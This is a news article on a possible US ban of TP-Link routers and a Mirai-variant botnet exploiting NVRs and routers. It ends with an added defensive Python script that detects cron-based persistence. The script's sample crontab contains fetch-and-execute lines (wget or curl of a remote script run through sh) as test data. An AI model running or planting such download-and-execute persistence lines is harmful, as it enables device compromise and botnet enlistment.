US May Ban TP-Link Routers Next Year Due To Cybersecurity; New Mirai Botnet Exploits NVRs, TP-Link Routers
TP-Link routers have been quite dominant in the US market lately. That dominance could soon end, as TP-Link routers are reportedly facing a possible ban in the US next year. Here is the reason behind it.
TP-Link Routers Could Be Banned Next Year In US
TP-Link is said to be currently under investigation by a trio of US government agencies including the Departments of Commerce, Defense, and Justice due to security concerns and potential ties to Chinese cyberattacks. These departments might consider putting a ban on TP-Link routers in the US next year.
There have previously been high-profile cyberattacks involving TP-Link routers, most notably a password-spraying attack that Microsoft released details on. The company allegedly ships its routers with security vulnerabilities and is resistant to addressing these flaws, while some reports suggest that the potential ban is more about the company’s ties to China than about specific security issues. While the news of this ban spread like wildfire, a TP-Link representative told CNET, “TP-Link has a secure, vertically integrated and US-owned international supply chain. Nearly all products sold in the United States are manufactured in Vietnam.”
Several cybersecurity experts believe it is likely that intelligence agencies have found something in TP-Link routers that warrants a ban. TP-Link routers do come with flaws, but so do other routers, so a vulnerability issue might not be the only reason.
If the US government decides to ban TP-Link routers, it will be a massive loss for the company, as its routers make up about 65% of the US market.
In another report, Bleeping Computer revealed that a new Mirai-based botnet is actively exploiting vulnerabilities in NVRs and TP-Link routers.
New Botnet Exploiting NVRs, TP-Link Routers
As per the report, this botnet is actively exploiting a remote code execution vulnerability that has not received a tracker number and appears to be unpatched in DigiEver DS-2015 Pro NVRs. The campaign is said to have started in October and targets multiple network video recorders and TP-Link routers with outdated firmware.
According to Akamai researchers, the botnet started to exploit the flaw in mid-November but the campaign has been active since September. This new Mirai malware variant targets CVE-2023-1389 on TP-Link devices and CVE-2018-17532 on Teltonika RUT9XX routers. Further, the researchers revealed that the Mirai variant is notable for its use of XOR and ChaCha20 encryption and its targeting of a broad range of system architectures, including x86, ARM, and MIPS.
Through command injection, the attackers fetch a malware binary from an external server and enlist the device into the botnet. Persistence is achieved by adding cron jobs. Once the device is compromised, it is then used to conduct distributed denial of service attacks or to spread to other devices by leveraging exploit sets and credential lists.
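For defenders checking a router or NVR for the cron-based persistence described above, the following is an added example, not code from the article or from the Akamai report. It flags crontab entries that download remote content and then run it or stage it in a temp directory. The article does not say what the cron jobs contain, so the download-and-execute pattern, the function names and the sample crontab are assumptions.

```python
import re

# Downloaders commonly present on embedded Linux (BusyBox) images.
FETCH = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# Signs that fetched content is then run: pipe to a shell, chmod, sh <file>, ./file
EXEC = re.compile(r"\|\s*(ba|a)?sh\b|\bchmod\s+\+?[0-7x]+\b"
                  r"|(^|[;&\s])(sh|bash)\s+\S|(^|[;&\s])\./\S")
# World-writable staging directories.
TMPDIR = re.compile(r"(^|[\s'\"=])/(tmp|var/tmp|dev/shm)/")
CHECKS = (("fetch", FETCH), ("exec", EXEC), ("tmpdir", TMPDIR))
MACRO = re.compile(r"^@(reboot|yearly|annually|monthly|weekly|daily|midnight|hourly)\s+(.*)$")
ENV = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def cron_command(line):
    """Return the command part of a user-crontab line, or None for non-jobs."""
    line = line.strip()
    if not line or line.startswith("#") or ENV.match(line):
        return None                   # blank line, comment or VAR=value setting
    m = MACRO.match(line)
    if m:
        return m.group(2)
    fields = line.split(None, 5)      # five schedule fields, then the command
    return fields[5] if len(fields) == 6 else None

def suspicious_cron_entries(crontab_text):
    """Return [(line_no, reasons, command)] for jobs that fetch and run remote content."""
    findings = []
    for no, raw in enumerate(crontab_text.splitlines(), 1):
        cmd = cron_command(raw)
        if cmd is None:
            continue
        reasons = [name for name, rx in CHECKS if rx.search(cmd)]
        # Report only a download combined with execution or temp-directory staging.
        if "fetch" in reasons and len(reasons) > 1:
            findings.append((no, reasons, cmd))
    return findings

# Constructed sample crontab (192.0.2.0/24 is a documentation address range).
SAMPLE = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * wget -q http://192.0.2.10/u.sh -O /tmp/u.sh; sh /tmp/u.sh
@reboot curl -s http://192.0.2.10/u.sh | sh
30 2 * * 0 curl -fsS https://updates.example.com/version.txt -o /var/lib/fw/version.txt
"""

if __name__ == "__main__":
    for no, reasons, cmd in suspicious_cron_entries(SAMPLE):
        print(f"line {no}: {'+'.join(reasons)}: {cmd}")
```

A hit is a lead for manual review rather than proof of compromise, and a clean result does not rule out persistence elsewhere on the device.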